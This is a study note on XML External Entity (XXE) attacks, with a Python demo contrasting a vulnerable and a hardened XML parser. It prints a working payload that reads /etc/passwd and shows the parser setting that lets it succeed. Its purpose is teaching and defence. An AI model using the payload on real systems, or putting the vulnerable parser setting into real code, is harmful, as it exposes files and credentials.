Definition

A4:2017-XML External Entities (XXE)

DTD: Document Type Definition. The DOCTYPE block at the top of an XML document can declare entities; a SYSTEM entity pointing at a file path or URL is what the parser fetches and expands in an XXE attack.

XXE attack

<aside> 📗 Look for XXE payloads: any input that reaches an XML parser is a candidate.

</aside>

<aside> 📗 A Content-Type bypass (an endpoint meant for JSON that also parses XML when the Content-Type is switched) can be reported as XXE.

</aside>

XXE: local file inclusion example for Unix systems

```xml
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY>
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>
```

The element declaration must be `ANY` (not `(#ANY)`, which is not valid DTD syntax). When the parser expands `&xxe;`, the contents of `/etc/passwd` are returned inside `<foo>`.

Defense

Disable DTD processing entirely if the application does not need it. Where DTDs must be accepted, turn off external general entities, external parameter entities and external DTD loading in the parser configuration, and keep the XML library patched. Prefer simpler formats such as JSON for new interfaces, and validate untrusted XML before it reaches the parser.
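The following Python example is added here to show both the local file inclusion payload above and the defence on this page in one place; it is not code from the original page. It uses the standard library `xml.sax` parser: with `feature_external_ges` enabled it reproduces the vulnerable behaviour and leaks a file, with the feature disabled (the stdlib default since Python 3.7.1) the same payload yields nothing. A constructed temporary file stands in for `/etc/passwd`, and the function and class names are mine.

```python
import io
import os
import tempfile
import xml.sax
import xml.sax.handler
from pathlib import Path


class TextCollector(xml.sax.handler.ContentHandler):
    """Collects all character data the parser delivers, including text
    spliced in from an expanded external entity."""

    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)

    def text(self):
        return "".join(self.parts)


def parse_xml(data: bytes, allow_external_entities: bool) -> str:
    """Parse XML and return the concatenated text content.

    allow_external_entities=True is the vulnerable setting: the parser
    resolves SYSTEM entities (file://, http://, ...) and returns their
    content as document text. False (the stdlib default since 3.7.1)
    leaves the reference unexpanded.
    """
    handler = TextCollector()
    parser = xml.sax.make_parser()
    parser.setContentHandler(handler)
    parser.setFeature(xml.sax.handler.feature_external_ges,
                      allow_external_entities)
    parser.parse(io.BytesIO(data))
    return handler.text()


def xxe_payload(system_id: str) -> bytes:
    """The page's LFI payload with the SYSTEM identifier parameterised."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE foo [\n"
        "<!ELEMENT foo ANY>\n"
        f'<!ENTITY xxe SYSTEM "{system_id}">\n'
        "]>\n"
        "<foo>&xxe;</foo>\n"
    ).encode()


def has_doctype(data: bytes) -> bool:
    """Defence in depth: untrusted XML has no business carrying a DTD.
    The keyword is case-sensitive per the XML spec; this check assumes an
    ASCII-compatible encoding (UTF-16 input would slip past it)."""
    return b"<!DOCTYPE" in data


def parse_untrusted(data: bytes) -> str:
    """Hardened entry point: reject any DTD, then parse with external
    entity resolution disabled."""
    if has_doctype(data):
        raise ValueError("DTD/DOCTYPE not allowed in untrusted XML")
    return parse_xml(data, allow_external_entities=False)


def demo():
    """Run the payload against both configurations using a constructed
    stand-in for /etc/passwd, so the demo needs no real system file."""
    secret = "root:x:0:0:root:/root:/bin/bash\n"  # constructed sample line
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as f:
        f.write(secret)
        path = f.name
    try:
        payload = xxe_payload(Path(path).as_uri())
        leaked = parse_xml(payload, allow_external_entities=True)
        safe = parse_xml(payload, allow_external_entities=False)
    finally:
        os.unlink(path)
    return leaked, safe


if __name__ == "__main__":
    leaked, safe = demo()
    print("vulnerable parser returned:", repr(leaked))
    print("hardened parser returned:  ", repr(safe))
```

Note that the hardened parser does not raise on the unexpanded entity; it silently returns empty text, which is why `parse_untrusted` also rejects any DOCTYPE up front so that attempts are visible rather than quietly neutralised. Other parsers (lxml, Java's DocumentBuilderFactory) need their own equivalent settings; the principle of disabling DTDs and external entities is the same.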